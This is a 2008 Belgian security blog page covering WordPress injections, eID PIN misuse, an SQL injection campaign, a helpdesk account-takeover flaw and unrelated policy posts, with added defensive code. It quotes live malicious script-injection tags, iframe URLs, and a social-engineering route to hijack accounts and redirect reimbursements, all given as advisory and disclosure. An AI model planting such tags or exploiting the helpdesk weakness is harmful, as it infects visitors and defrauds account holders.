• Thousands need to update WordPress (again)

    You should have updated WordPress again by now. An important security update was released last week.

    Otherwise you could get infected by injected iframes like these:

    http://www.wp-stats-php.info

    http://61.155.8.157/iframe/wp-stats.php

    http://www.rxpharmacyonline.org/1/js_go_f1.php

    If I google "powered by wordpress" site:be then I have about 251.000 pages, but if I add 2.5.1 (the last version) then I only have 47 pages. It seems the version isn't always indicated on the site (that would make it too easy).

    But as said before, this doesn't mean the injection bots won't come by and try leaving their mark on your site, like dogs on every corner they can find...

     

  • Confusing indications of what is adware, malware and spyware in share and freeware

    Take this as an example

    Acez jukebox from http://www.acez.com or http://freefunfiles.com

    According to badware.org this is adware (red)  

    According to spywaresignatures and many others this has adware, but moderate 

    But according to softalizer this is free of malware and adware, and suggestsoft.com says the same.

    So what is it?

    Some antivirus companies say it is greyware, it is not really adware or a virus but you shouldn't allow it on your network. That is clear for your network, but for the simple home-user looking for something free, this seems quite confusing.

    I didn't find it on download.com but on many others. Maybe those others should start looking at why I trust download.com more than those that just upload any crap they receive 

  • How do you recognize links to hacked Wordpress blogs

    There was an automated worm that used a vulnerability in WordPress to install a folder "wp-content/1/" holding several pages that forward visitors to other domains. It is in fact a spambot. So when you see links popping up with that path in them, you can be sure that the site was hacked.

    Some spammed forums:

    www.pzwvl.be

    www.afkikker.be

    www.quicklaw.be

    douwen.sin.khk.be

    Some of the sites that have such a vulnerability are flagged by Google as dangerous:

    Fast cash advance payday loan

    This site may harm your computer.
    Fast Cash Advance Payday Loan. Fast cash advance payday loan Imagine that you qualify for. This should be a dangerous situation if you prefer, you may have. ...
    voice.satama.com/wp-content/1/fast-cash-advance-payday-loan.html
  • Huge mistake when using your eID

    Today I came across the blog of a developer who was very proud of having integrated the eID card with OpenID, a kind of Single Sign-On for blogs (ref. http://blog.rootshell.be/2008/04/28/openid-and-belgian-eid/).

    This guy is a technical person, and he made a huge mistake that every citizen could make. When using the service, he was asked to authenticate on the site, that is, to enter his PIN code in a dialog box coming from the Web site (we see a picture on the blog). And he did it! And he found this normal!

    What was the result: the Web site received the PIN code.

    This is a huge mistake: never type your PIN in any dialog box other than the one coming from the middleware. Even if a local application asks for it, don't type it. There is absolutely no need to. The PIN is only needed to "unlock" a feature on the card. No application ever needs the PIN.

    In case a software or Web site developer tells you that it is normal, tell him that the application is badly designed and insecure. I have been giving eID training to developers for several years, and in each session I have at least one developer (and sometimes several) telling me that this was the way they developed an application "because they didn't know".

     Please explain that to all of your friends, colleagues, etc.

     

    Marc Stern  --  marc.stern [at] approach.be

  • Verviers again called a terrorist center or not ?

    We can ask ourselves what it is with Verviers that, after the so-called PKK training camps (which were not there), it is now called the center of Hamas in Europe according to a new report.

    We have already treated this report before (you read some things first here... and some were already published by theinquirer (now at our furl.net archive a year before)). There are other things in that report that are much more important and that show that Belgium is being very active in trying to limit the influence of radicals in the organised Muslim communities in Belgium (last page).

    This report shows very clearly a problem with the definition of terrorism or sympathiser without taking into account all the consequences of such a labelling. We should be harsh and unrelenting against terrorists and their direct immediate supporters and networks, but we shouldn't label every opposition, critique and protest as terrorist, which is what some of these think tanks and organisational charts are doing (for example, the charts in this report).

    And this guy participated in an event organised by the American embassy several years ago which had the goal of bringing moderate Muslim leaders and the western political leaders and professors together in an open dialogue, trying to build a bridge. So would he be invited if he was a mole or a spy? Wouldn't he be vetted thoroughly, inside out and upside down, before they sent him an invitation? Would he still be invited if they had found any trace of links to terrorist groups or quotes that would show any sympathy?

    Of course he could have changed course, as people sometimes do. And while Hamas is a terrorist organisation for some, it isn't for others, and such organisations have a multitude of organisations so people can participate in their movement (charity, solidarity, political pressure) without being in contact with any of the more military activities or sympathies. It is sure that they are part of the same movement and that they are at the top organised or controlled by the same people, but labelling anyone a terrorist who has anything to do with any of those organisations (submarines) is sometimes a bit far-fetched. Except if you want to have 2 million people on your terrorist watchlist.

    But as the organisation has the same name as an important mosque, as a Hamas brigade of so-called martyrs that are responsible for suicide attacks, and as the Hamas TV channel that uses Disney figures to teach children that the most important thing in life is to blow themselves up, it is understandable that doubts linger.

    Al-Aqsa Foundation, Belgium: A Hamas-affiliated foundation outlawed by Israel in 1997 and classified as a terrorist organization in 1998, and designated by American Executive Order 13224 and in Switzerland and in the UK and so on. The guy should know this also.

  • Decade-old voting code used for next year's elections

    So they go at it once again. The same code that has now been used for more or less a decade will be used again in the election next year. There was no alternative, as the report from the universities is embroiled in controversy (as their choices include things like RFID and very few controls) and the parliaments still have to organize their debate (and want to hear some experts and other opinions than the traditional 'no problemo'). The question is when, because the same parliaments are already preoccupied with a lot of typical Belgian institutional questions that dominate the politicians and their advisors (while the population begins to feel the inflation of the prices of basic food and services).

    If there are code gurus or fuzzers out there, here is the code. They say it has been vetted and controlled already several times by so-called auditors from some of the big 4. If you can find a mistake, then you should take someone's place over there (joke). http://www.ibz.rrn.fgov.be/index.php?id=66&L=1

    If you don't want to send your code remarks directly, we have backchannels if needed.

  • some interesting documents

    Hearings in the US senate about the future of the internet with some high level speakers (Lawrence Lessig)

    US National Spectrum Policy for the future (gps, bands, ....)  

    UK document about Next Generation Broadband 

    US science and technology policy overview

     

    Workshop by Rand about assumption based analysis of the US antiterrorism strategy and alternatives (80 pages)

    Battlewise, the networked warfare  

    Precision in the war on terror and inciting muslims (US strategic military studies) 

    The al-Qaida virtual media network (March 2008, good report)

    Challenge of nuclear-armed regional adversaries (RAND)

    How the decision came about to invade Iraq

    Foreign military assets in natural disaster response 

    Paper about hate speech 

    US datamining and homeland security

    US congressional oversight of intelligence

    US interagency reform debate about national security

     

    US department of Justice guide for Electronic Evidence First Responders - new version april 2008 (74 pages) a must

    US department of Justice guide for treatment of victims for First responders 

    Final Report of the US national critical infrastructure advisory board about the chemical, biological and radiological events and the national critical infrastructure workforce (recommendations) 88 pages

     

    Climate change as a security risk (German Advisory Board on change) 

    Arctic climate impact study WWF

     

    Report from US General Accounting Office about the challenges of email management in 4 administrations

    European roundtable of experts about Assessing the Cyberwarfare threat 

    Information Security and Data Breach Notification Safeguards (PDF; 156 KB) Source: Congressional Research Service

    US congressional hearings about new rights for credit card holders 

    Why the proposed IFILE system by the US (tax) IRS won't work (people can prepare and file their tax returns electronically) 

    the complexity of implementing RealID in the US 

     

    IMF report about Housing markets and business cycles

    The report to the international decision makers from the Financial Stability Forum 

  • Nearly 1 million people on the US terrorist watch list

    Such lists only make sense if only the most pertinent persons are included. You will never succeed in stopping all the sleepers and unknown militants without at the same time denying access, travel or privacy to hundreds of thousands of other persons who have done nothing wrong other than to correspond to a mix of characteristics that triggers a formula.

    If you want to read more about the list (official information) You can't know if you are on the list and it is not clear how you can be removed from the list.

    You can follow here the number of persons added to the list, presumably.
  • Jerome Kerviel, the biggest fraudulent speculator of all time, has an IT job

    He has the job of IT consultant. This job was promised by a friend of his lawyer so he could leave his 'VIP single cell' after only a few days. He has very strict bail conditions, but even so.

    Would you trust someone like that working with your ICT infrastructure or data ?

  • New updates from selected freeware

     

       Free Easy CD DVD Burner 3.8


    What's new in this version: Version 3.8 is a bug fixing release.
    updated: 4/21/2008
    new version: 3.8
    filed under: CD & DVD Burners
    PScanner++ 1.7.5.2  

    What's new in this version: Version 1.7.5.2 error fixed and improvements.
    updated: 4/17/2008
    new version: 1.7.5.2
    filed under: Spyware Removers
    TekRadius 2.3  

    What's new in this version: Version 2.3 comes with a console utility for adding, deleting and modifying users.
    updated: 4/17/2008
    new version: 2.3
    filed under: Internet
    IncrediMail Xe 5.7 build 3524  

    What's new in this version: Version 5.7 build 3524 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/18/2008
    new version: 5.7 build 3524
    filed under: Clients
    Allena 3.2.4  

    What's new in this version: Version 3.2.4 fixes a ribbon bug and a menu form repaint problem.
    updated: 4/23/2008
    new version: 3.2.4
    filed under: Applications
    Fresh Download 8  

    What's new in this version: Version 8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 8
    filed under: Download Managers
    Book Search Pro 2  

    What's new in this version: Version 2 has new interface and bug fixed.
    updated: 4/20/2008
    new version: 2
    filed under: Search Tools
    LanTopolog 1.02  

    What's new in this version: Version 1.02 includes quality of network discovery results.
    updated: 4/20/2008
    new version: 1.02
    filed under: Network
    AV Video Morpher 3.0.13  

    What's new in this version: Version 3.0.13 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/17/2008
    new version: 3.0.13
    filed under: CD & DVD Burners
    Ping Test Easy 3.39  

    What's new in this version: Version 3.39 enhances the IP scan speed.
    updated: 4/21/2008
    new version: 3.39
    filed under: Network
    MSKeyViewer Plus 2  

    What's new in this version: Version 2 added command-line options to access a remote registry and export software information found to a .txt or .csv file, fixed detections for COMODO Firewall, Flash Player, and Spybot S&D.
    updated: 4/23/2008
    new version: 2
    filed under: System Utilities
    Miro 1.2.3  

    What's new in this version: Version 1.2.3 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/23/2008
    new version: 1.2.3
    filed under: Video Players
    PowerFolder 3.0.1  

    What's new in this version: Version 3.0.1 improves connection stability and contains several other bug fixes
    updated: 4/23/2008
    new version: 3.0.1
    filed under: Remote Access
    iTunesControl 0.41  

    What's new in this version: Version 0.41 fix for a bug that prevented certain hotkey combinations from being saved.
    updated: 4/21/2008
    new version: 0.41
    filed under: Audio Plugins & Utilities
    SysAdmin 2.0 build 3017  

    What's new in this version: Version 2.0 build 3017 includes list of computers it is added IP the address, check of availability of the computer is replaced with check with the help command PING, and possibility of addition OU in containers.
    updated: 4/17/2008
    new version: 2.0 build 3017
    filed under: Management Tools
    Ashampoo ClipFinder 1.39  

    What's new in this version: Version 1.39 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 1.39
    filed under: Video Players
    Artisan DVD/DivX Player 3.45  

    What's new in this version: Version 3.45 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/16/2008
    new version: 3.45
    filed under: Digital Media Players
    BayGenie eBay Auction Sniper Free 3.1.3  

    What's new in this version: Version 3.1.3 has set the default time server to use eBay server.
    updated: 4/21/2008
    new version: 3.1.3
    filed under: Auction Tools
    Acala DVD 3GP Ripper 2.9.8  

    What's new in this version: Version 2.9.8 is a bug fixing release.
    updated: 4/23/2008
    new version: 2.9.8
    filed under: DVD Software
    SmartFTP Client (32-bit) 3.0.1013.8  

    What's new in this version: Version 3.0.1013.8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/21/2008
    new version: 3.0.1013.8
    filed under: FTP Software
    Ad-Aware SE Definition File SE1R239 (04/16/2008)  

    What's new in this version: The latest release adds new definitions.
    updated: 4/21/2008
    new version: SE1R239 (04/16/2008)
    filed under: Spyware Removers
    Advanced WindowsCare Personal 2.7.2  

    What's new in this version: Version 2.7.2 is a bug fixing release.
    updated: 4/20/2008
    new version: 2.7.2
    filed under: Diagnostic Software
    Free Hide Folder 2 build 20080408  

    What's new in this version: Version 2 build 20080408 includes unspecified updates.
    updated: 4/22/2008
    new version: 2 build 20080408
    filed under: Encryption Software
    Handy Backup Standard 6.0.8  

    What's new in this version: Version 6.0.8 has been certified with the "Works with Windows Vista" logo, with 'Run as Windows service' feature, and numerous updates and bug fixes.
    updated: 4/21/2008
    new version: 6.0.8
    filed under: Backup Software
    CyeWeb One Channel 2.1.2  

    What's new in this version: Version 2.1.2 adds wildcard searching.
    updated: 4/20/2008
    new version: 2.1.2
    filed under: Webcam & Video
    Adblock Plus 0.7.5.4  

    What's new in this version: Version 0.7.5.4 locales added Hebrew and Malay; improved Firefox 3 compatibility; changed default keyboard shortcuts to Ctrl+Shift+E (preferences) and Ctrl+Shift+V (blockable items); and removed Check banner links option.
    updated: 4/23/2008
    new version: 0.7.5.4
    filed under: Firefox Extensions
    Advanced DVD Player 2.33  

    What's new in this version: Version 2.33 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/23/2008
    new version: 2.33
    filed under: Digital Media Players
    Apex Video Converter Free 6.73  

    What's new in this version: Version 6.73 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/16/2008
    new version: 6.73
    filed under: Video Converters
    Merge MP3 0.1f  

    What's new in this version: Version 0.1f includes unspecified updates.
    updated: 4/16/2008
    new version: 0.1f
    filed under: Audio Plugins & Utilities
    Clean My Registry 4.5  

    What's new in this version: Version 4.5 new localizations.
    updated: 4/17/2008
    new version: 4.5
    filed under: System Utilities
    Acala 3GP Movies Free 2.9.8  

    What's new in this version: Version 2.9.8 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 2.9.8
    filed under: Video Converters
    IE PassView 1.08  

    What's new in this version: Version 1.08 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/17/2008
    new version: 1.08
    filed under: Encryption Software
    WOT for Firefox 20080421  

    What's new in this version: Version 20084021 features an improved user interface and website reputation scorecard.
    updated: 4/23/2008
    new version: 20080421
    filed under: Firefox Extensions
    SpeedFan 4.34  

    What's new in this version: Version 4.34 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 4.34
    filed under: System Utilities
    XnView 1.93.6 beta 2  

    What's new in this version: Version 1.93.6 beta 2 may include unspecified updates, enhancements, or bug fixes.
    updated: 4/22/2008
    new version: 1.93.6 beta 2
    filed under: Image Editing
    Mozilla Firefox 2.0.0.14  

    What's new in this version: Mozilla Firefox 2.0.0.14 fixes a crash in JavaScript garbage collector.
    updated: 4/17/2008
    new version: 2.0.0.14
    filed under: Web Browsers
    Online TV Player 4.0.20  

    What's new in this version: Version 4.0.20 updates channel database.
    updated: 4/17/2008
    new version: 4.0.20
    filed under: Video Players
    AVG Anti-Virus Free Edition 8.0.1  

    What's new in this version: Version 8.0.1 adds integrated spyware protection and a new LinkScanner feature that gives users safety rankings for their Google, Yahoo, and MSN searches.
    updated: 4/23/2008
    new version: 8.0.1
    filed under: Antivirus Software

  • International organisations like UN and Unctad infected / injected

    International organisations and sites all over the world are being infected/injected by a new SQL attack that seems to be spreading better than sex pictures of a celebrity.

    The injection to look for is <script src=http://www.nihaorr1.com/1.js></script>

    one can find it on the following international websites


     

    For the rest Google this " src http www nihaorr1 com 1 js " 
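
    A defender's check for the indicators named on this page (off-site script and iframe tags as in this post and the first one, and links into a "wp-content/1/" folder from the hacked-WordPress post), as an added example that is not part of the original posts. The function names, the own-hosts allowlist and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Folder left behind by the WordPress spam worm described on this page.
WP_SPAM_MARKER = "/wp-content/1/"


def _split(url):
    """urlsplit that tolerates malformed values found in injected markup."""
    try:
        return urlsplit(url)
    except ValueError:
        return urlsplit("")


class IndicatorScanner(HTMLParser):
    """Collects off-site <script>/<iframe> sources and wp-content/1/ links."""

    def __init__(self, own_hosts):
        super().__init__(convert_charrefs=True)
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (kind, url) in document order

    def _is_own(self, host):
        # A host is "ours" if it is an allowlisted name or a subdomain of one.
        return any(host == own or host.endswith("." + own)
                   for own in self.own_hosts)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe"):
            src = (attrs.get("src") or "").strip()
            host = _split(src).hostname  # None for relative URLs
            if host and not self._is_own(host.lower()):
                self.findings.append(("offsite-" + tag, src))
        elif tag == "a":
            href = (attrs.get("href") or "").strip()
            if WP_SPAM_MARKER in _split(href).path.lower():
                self.findings.append(("wp-spam-link", href))


def scan_html(html, own_hosts):
    """Return the list of (kind, url) findings for one page of HTML."""
    scanner = IndicatorScanner(own_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a page whose database-backed text fields were injected,
# plus a spammed comment. example.org stands in for the site being checked.
SAMPLE_PAGE = """
<html><body>
<h1>Event detail</h1>
<script src="/js/site.js"></script>
<p>Meeting room 4<script src=http://www.nihaorr1.com/1.js></script></p>
<iframe src="http://61.155.8.157/iframe/wp-stats.php" width=0 height=0></iframe>
<p>Comment: <a href="http://blog.example.net/wp-content/1/some-page.html">loans</a></p>
<p><a href="http://static.example.org/about.html">About</a></p>
</body></html>
"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_PAGE, ["example.org"]):
        print(f"{kind:15} {url}")
```

    Run it over pages fetched from your own site (or over rows exported from the database behind them) and treat every finding as something to review, since legitimate third-party scripts will also show up until they are added to the allowlist.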

     

  • how well is your door locked

    It took a professional locksmith a piece of plastic and 5 minutes to open a door with three locks. The locks were not those special ones for which you need a card if you lose it, but they still were expensive locks.

    That piece of plastic can only be sold to and used by official locksmiths, but even then it is impressive to see how fast a door can be opened.

    This I have learned before. After a break-in in an apartment the locksmith told me that thieves look at a door and count the number of minutes they would need to open it. If it took more than 3 to 5 minutes and there were other doors that would take less, they would leave your door/apartment alone.

    Cybersecurity is no different. Make it very difficult for the script kiddies and automated scanning tools, and use special tools to keep an eye open for the professional who can attack one port or vulnerability at a time, sometimes over weeks. If you don't keep and interrelate/datamine your logs, you won't find these targeted professional attacks and you are without a clue.
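
    What interrelating logs over a long period can look like, as an added example that is not part of the original post: denied connections are grouped per source over weeks, so a source that tries one port every few days stands out even though no single day looks unusual. The log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed firewall log format (constructed for this example).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) DENY "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"
)


def parse(lines):
    """Yield (timestamp, source, port) for every well-formed DENY line."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["src"], int(m["dport"])


def widest_port_spread(events, window):
    """Most distinct ports seen inside any span of length `window`."""
    best, start, counts = 0, 0, defaultdict(int)
    for ts, port in events:  # events are sorted by time
        counts[port] += 1
        while ts - events[start][0] > window:
            old = events[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def classify_sources(lines, window_days=30, min_ports=5, daily_alert=5):
    """Map source -> 'burst-scan' (visible in one day) or 'slow-scan'
    (only visible when weeks of logs are correlated)."""
    per_src = defaultdict(list)
    for ts, src, port in parse(lines):
        per_src[src].append((ts, port))
    verdicts = {}
    for src, events in per_src.items():
        events.sort()
        ports_per_day = defaultdict(set)
        for ts, port in events:
            ports_per_day[ts.date()].add(port)
        busiest_day = max(len(p) for p in ports_per_day.values())
        spread = widest_port_spread(events, timedelta(days=window_days))
        if busiest_day >= daily_alert:
            verdicts[src] = "burst-scan"
        elif spread >= min_ports:
            verdicts[src] = "slow-scan"
    return verdicts


# Constructed sample (documentation address ranges): one noisy scanner, one
# source probing a new port every four days, one host retrying a single port.
SAMPLE_LOG = """
2008-04-01 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=21
2008-04-02 09:12:00 DENY src=192.0.2.10 dst=192.0.2.1 dport=25
2008-04-03 09:12:00 DENY src=192.0.2.10 dst=192.0.2.1 dport=25
2008-04-05 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=22
2008-04-09 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=23
2008-04-10 02:14:01 DENY src=203.0.113.50 dst=192.0.2.1 dport=21
2008-04-10 02:14:02 DENY src=203.0.113.50 dst=192.0.2.1 dport=22
2008-04-10 02:14:03 DENY src=203.0.113.50 dst=192.0.2.1 dport=23
2008-04-10 02:14:04 DENY src=203.0.113.50 dst=192.0.2.1 dport=25
2008-04-10 02:14:05 DENY src=203.0.113.50 dst=192.0.2.1 dport=80
2008-04-10 02:14:06 DENY src=203.0.113.50 dst=192.0.2.1 dport=110
2008-04-10 02:14:07 DENY src=203.0.113.50 dst=192.0.2.1 dport=443
2008-04-13 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=80
2008-04-17 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=443
2008-04-20 09:12:00 DENY src=192.0.2.10 dst=192.0.2.1 dport=25
2008-04-21 03:00:00 DENY src=198.51.100.7 dst=192.0.2.1 dport=3389
"""

if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(SAMPLE_LOG.splitlines()).items()):
        print(src, verdict)
```

    With a 7-day window the slow source disappears from the result, which is the reason to keep the logs long enough to correlate.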

  • Sodexho - dienstencheques

    Combining a full-time job as security consultant with being a SANS instructor AND having a non-imaginary girlfriend :-) doesn't leave much time for cleaning the apartment. So, a few weeks ago I decided to get myself a cleaning lady. I already had an account on AccorServices (the former provider of "dienstencheques") from the year before, so I didn't have to enroll myself again with Sodexho (the current provider of "dienstencheques").

    Getting up this morning, half asleep, trying to view my account on Sodexho, I suddenly realised that I had forgotten my username and password. As I am security aware, all my account information is in my head, so I am pretty screwed right now. There is an option to recover your password through email ... but I am not really sure if my username is correct. The only thing left is to call the friendly lady at the helpdesk:

    Me: Good morning, this is Mr. ABC speaking from XY

    Helpdesk: Good morning sir, Alicia (fake name) speaking. How can I help you?

    Me: Well, I have my username and password here, but I am unable to login. How can I solve this?

    Helpdesk: What is your personal account number?

    Me: XXX-XXXX-XXX (censored for obvious reasons, especially if you read the rest of this conversation)

    Helpdesk: Thank you. Are you Mr. ABC?

    Me: yups, that's me!

    Helpdesk: Ok, I will give you your login credentials. Do you have something to write it down?

    Me: Sure

    Helpdesk: Your login is XXXX and password is XXXX

    Me: Let me try that .... (silence) .... ok! great, it's working! Thanks!

    Helpdesk: No problem sir! Goodbye

    Me: Thank you and goodbye

    Now, the problem here is that whoever knows the personal account number, could potentially receive the login credentials for a personal account. Now guess what ... which number does a service provider need to credit your "dienstencheques"? YES! The personal account number!

    Basically, this means that anyone who is providing services for you, can confirm his own services if he is able to steal your login details as I did here above. What a service! Now I don't even have to confirm my payments anymore!

    And that's not all ... you can also ask for a "reimbursement" of your cheques if you decide you don't need them anymore. So anyone who has your personal account number, can login, use the "change preferences" to change the bank account number, and then ask for a reimbursement of your cheques.

    Oh boy ... did I use an l33T 0day exploit for this? Or a vulnerability that was already known since .... Columbus discovered the Americas? :p

    <free consultancy, targeted for Sodexho>

    Before doing sensitive transactions for an account, verify the identity of the caller. This can be done by using a "shared secret":

    1. At registration, let each user provide a "shared secret". Note that the personal account number of Sodexho is NOT a shared secret, because this is known also by the service providers. "Shared" means something known only by Sodexho and your client. Not shared over the whole world :p

    2. Ask some personal identification details randomly (not 100% secure, but better than nothing): address, passport number, SIS-card number, birth date, bank account number ..

    That's what is known as "identification and authentication". Next, you can reset the password, or send a password reset link to the email address you have on file. If they claim they don't have access to the email address, reset the password and always send a confirmation email to the account on file.

    Also, some DO NOT's:

    - provide personal information (name, address, ...) BEFORE you have identified and authenticated your caller. Things like "Are you Mr. ABC" before authentication are BAD :p

    - let someone change any preferences in the account (such as the bank account number) without confirming through an email address on file, or asking again for the password.

    - let someone reimburse without confirming through email 

    </free consultancy, targeted for Sodexho>

     Well, that's about it again for now. Back to real-life :-).

    Yours Truly,

     

    PS: Anyone attended DC16, msg me
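
    The caller verification recommended in the post above, sketched as code. This is an added example, not Sodexho's system and not part of the original post: the class, method names, account number and messages are hypothetical. The account number alone authenticates nobody, the desk never reads credentials out, and a bank account change only takes effect after confirmation through the e-mail address on file.

```python
import hashlib
import hmac
import secrets

GENERIC_REPLY = ("If the details match, a message was sent to the "
                 "e-mail address on file.")


def _kdf(secret, salt):
    # The shared secret is stored only as a salted PBKDF2 hash.
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 200_000)


class Helpdesk:
    """Hypothetical helpdesk back end; every name here is illustrative."""

    def __init__(self):
        self.accounts = {}  # account number -> record
        self.pending = {}   # one-time token -> (account number, action, value)
        self.outbox = []    # (e-mail on file, message) pairs the desk "sent"

    def register(self, account_no, email, shared_secret, bank_account):
        salt = secrets.token_bytes(16)
        self.accounts[account_no] = {
            "email": email,
            "bank_account": bank_account,
            "salt": salt,
            "secret_hash": _kdf(shared_secret, salt),
        }

    def _authenticated(self, account_no, claimed_secret):
        rec = self.accounts.get(account_no)
        # Hash even for unknown accounts so timing does not reveal which exist.
        salt = rec["salt"] if rec else b"\x00" * 16
        candidate = _kdf(claimed_secret, salt)
        return rec is not None and hmac.compare_digest(
            candidate, rec["secret_hash"])

    def _mail_token(self, account_no, action, value=None):
        token = secrets.token_urlsafe(32)
        self.pending[token] = (account_no, action, value)
        email = self.accounts[account_no]["email"]
        self.outbox.append((email, f"Confirm {action} with token {token}"))

    def reset_call(self, account_no, claimed_secret):
        # Service providers know the account number too, so it proves nothing.
        if self._authenticated(account_no, claimed_secret):
            self._mail_token(account_no, "password-reset")
        # Same words on success and failure; no name, login or password given.
        return GENERIC_REPLY

    def bank_change_call(self, account_no, claimed_secret, new_bank_account):
        if self._authenticated(account_no, claimed_secret):
            self._mail_token(account_no, "bank-change", new_bank_account)
        return GENERIC_REPLY

    def confirm(self, token):
        # Single-use token: the change happens only after e-mail confirmation.
        entry = self.pending.pop(token, None)
        if entry is None:
            return False
        account_no, action, value = entry
        if action == "bank-change":
            self.accounts[account_no]["bank_account"] = value
        return True


if __name__ == "__main__":
    desk = Helpdesk()
    # Constructed sample data.
    desk.register("ACC-0001", "owner@example.org", "blue heron 42",
                  "BE00-ORIGINAL")
    print(desk.reset_call("ACC-0001", "wrong guess"))  # nothing is mailed
    print(desk.bank_change_call("ACC-0001", "blue heron 42", "BE00-NEW"))
    print(len(desk.outbox), "message(s) sent to the address on file")
```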

  • Tibet, thanx to the web, information travels

    http://www.wikileaks.org/wiki/Wikileaks_releases_over_150_censored_videos_and_photos_of_the_Tibet_uprising

    Wikileaks, the site that lawyers tried to bring down, has published hundreds of pictures and videos about the recent and ongoing uprising.

  • Geo Ip location from right to wrong

    Did a test with some

    http://www.geoiptool.com/  right, just a country map

    http://www.geoip.co.uk/    right, but just a country map 

    http://www.hostip.info/index.html  right, with a city map and right again

    http://www.ip2location.com/?s=google  country right, network right, city wrong

    http://www.geobytes.com/IpLocator.htm?GetLocation the same city wrong 

    http://www.maxmind.com/app/locate_ip  right no map

    and something interesting   http://www.cucy.net/map/georoute.html traceroute

    maybe you will need a proxy to anonymize

  • Search engines will have to erase european searchlogs

    http://ec.europa.eu/justice_home/fsj/privacy/docs/wpdocs/2008/wp148_en.pdf

    The privacy commission wants all search engines to erase all the information about the searches by Europeans or from Europe after 6 months. This would be the case for any search engine, whatever its location.

    But as it is already complicated enough as it is, they won't try to impose it, but hope there will be general agreements between the European privacy commissions and the biggest search engines, in the hope the others will follow.

  • Belgian EID and the Microsoft question

    Itprofessional publishes today a 2 page article about the bubble that the Belgian EID is becoming. Under the last government Minister Van Velthoven made it his pet project, and every so many weeks there were new announcements and projects, and it couldn't become less than the biggest ID project on earth. Even Bill Gates came along, received a bogus card (forgery) and told everybody how interested he was in this project. Today, according to the article, most of the Microsoft EID veterans in Belgium have gone, Redmond has lost interest and the new Belgian Microsoft executives have expressed criticism (and repeat it in this article) that the Belgian EID is not fully compatible with European norms for EID.

    Bruno Segers (ex Microsoft) tries to save face a bit for FEDICT, the project managers responsible for the roll-out and development of EID, but the criticism from the developers of EID-compatible products is harsh and without excuse. The documentation is not helpful, if you know how to find and interpret that information. And even if there are hundreds of applications that could work with EID, then it is clear that there is no communication anymore, neither for the developers nor for the public, that is web2.0, advertised and usable.

    As Agoria (the organisation of the high-tech industry in Belgium) says, it is time for something new. They say 'communication' (which costs a lot of money and just doesn't solve anything because already too much money has been spent on such campaigns) but maybe it is more coordination, more involvement and more integration that is needed between the different stakeholders.

    And maybe people don't want their EID to be a paymentcard. Maybe people don't want to use their EID for a lot of other things. Maybe people just want their EID to be just that, an EID.  

    and maybe there are other reasons for this season of discontent. 

  • Email is just like a letter in the post

    The problem with being a computer 'expert' is that people always have a lot of questions when you 'out' yourself.

    But sometimes it is also good to know afterwards that you have accomplished something. So 2 years ago a self-employed man asked me what to do with the avalanche of email he needed to treat every day.

    'Just treat it like your normal post,' I answered.

    My normal post?

    Print it - file it - read it thoroughly - think about it - write a first answer - keep it - rethink about it - and when you are absolutely sure, then send it.

    Every time this consultant is in my city visiting his clients, he thinks about it because it was the best business advice he has ever got. It got him out of trouble.

    The only trouble is that his correspondents don't think the same way. So they are asking for immediate answers. But email is not instant messaging when you are doing business - it is like the post (but by other means) and can have the same (legal) consequences. Just think about it.

    The same goes for personal use of email. If you are not sure that you should respond to a message in email or instant messaging, just don't. Because on the internet, nothing will stay strictly personal forever.

    And what does that have to do with security? Well, if you don't open your email in a race against the flood, you won't open zero-day viruses and your antivirus will have a better chance of killing that malware.

    I sometimes call it the danger of the 'instant generation'. Instant sending, instant opening, instant replying, instant interacting - clicking idiots. The day there are powerful SMS viruses this will be the biggest problem. We will have to change these reflexes instantly. 

  • Belgium is a safe haven for the Muslim Brotherhood ?

    This is what a report from an American antiterrorism thinktank says.

    "Since its origins in early student organizations, the Belgian Brotherhood network has grown to include Hamas support infrastructure and local Islamic groups that in turn are part of the Federation of Islamic Organizations in Europe (FIOE), the global Muslim Brotherhood umbrella group in Europe. Belgium also serves as the FIOE national office. One individual, Bassem Hatahet, appears to be the most important figure in the Belgian Muslim Brotherhood."

